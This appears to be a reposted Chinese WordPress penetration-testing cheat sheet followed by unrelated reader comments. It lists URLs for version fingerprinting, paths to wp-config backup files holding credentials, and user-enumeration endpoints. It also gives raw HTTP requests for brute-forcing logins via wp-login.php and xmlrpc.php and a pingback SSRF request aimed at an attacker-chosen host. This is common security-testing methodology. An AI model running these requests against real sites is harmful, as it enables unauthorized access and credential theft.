如果您遇到使用 WordPress 的网站,您会怎么做,渗透思路和安全检测思路?
如何挖掘Wordpress网站的漏洞
如果您访问https://target.com并查看源代码,您将看到来自 WordPress 的主题和插件的链接。
或者你可以访问https://target.com/wp-login.php,它是 WordPress 登录管理页面
通过查看核心、插件和主题版本找到相关的CVE
如何找到wordpress版本
https://target.com/feed https://target.com/?feed=rss2
如何找到插件版本
https://target.com/wp-content/plugins/PLUGINNAME/readme.txt https://target.com/wp-content/plugins/PLUGINNAME/readme.TXT https://target.com/wp-content/plugins/PLUGINNAME/README.txt https://target.com/wp-content/plugins/PLUGINNAME/README.TXT
如何找到主题版本
https://target.com/wp-content/themes/THEMENAME/style.css https://target.com/wp-content/themes/THEMENAME/readme.txt (If they have readme file)
如果您发现过时的核心/插件/主题,请在https://wpscan.com找到漏洞利用
查找日志文件
http://target.com/wp-content/debug.log
查找备份文件 wp-config
http://target.com/.wp-config.php.swp http://target.com/wp-config.inc http://target.com/wp-config.old http://target.com/wp-config.txt http://target.com/wp-config.html http://target.com/wp-config.php.bak http://target.com/wp-config.php.dist http://target.com/wp-config.php.inc http://target.com/wp-config.php.old http://target.com/wp-config.php.save http://target.com/wp-config.php.swp http://target.com/wp-config.php.txt http://target.com/wp-config.php.zip http://target.com/wp-config.php.html http://target.com/wp-config.php~
获取网站上的用户名
http://target.com/?author=1
或者
http://target.com/wp-json/wp/v2/users http://target.com/?rest_route=/wp/v2/users
爆破后台账号密码
POST /wp-login.php HTTP/1.1
Host: target.com
log=admin&pwd=BRUTEFORCE_IN_HERE&wp-submit=Log+In&redirect_to=http%3A%2F%2Ftarget.com%2Fwp-admin%2F&testcookie=1
或者
POST /xmlrpc.php HTTP/1.1
Host: target.com
<?xml version="1.0" encoding="UTF-8"?>
<methodCall>
<methodName>wp.getUsersBlogs</methodName>
<params>
<param><value>admin</value></param>
<param><value>BRUTEFORCE_IN_HERE</value></param>
</params>
</methodCall>
wordpress 中的 XSPA
POST /xmlrpc.php HTTP/1.1
Host: target.com
<methodCall>
<methodName>pingback.ping</methodName>
<params><param>
<value><string>http://yourip:port</string></value>
</param><param>
<value>
<string>https://target.com></string>
</value>
</param></params>
</methodCall>
注册启用
http://example.com/wp-login.php?action=register
本文作者:HACK_Learn
本文为安全脉搏专栏作者发布,转载请注明:https://www.secpulse.com/archives/187638.html
© 版权声明
部分文章采集于互联网,若侵权请联系删除!
THE END
cesfe 1个月前0
好的,谢谢昶之琴 1个月前0
这个安装地址失效了,我在网上找了一个:https://xiazai.zol.com.cn/detail/35/344340.shtml 如果还是不行的话就需要您自己去网上找找了cesfe 1个月前0
帆软部署 ,访问的地址访问不到昶之琴 2年前0
我以为只要提交就行了好想告诉你 2年前0
花巨资看一下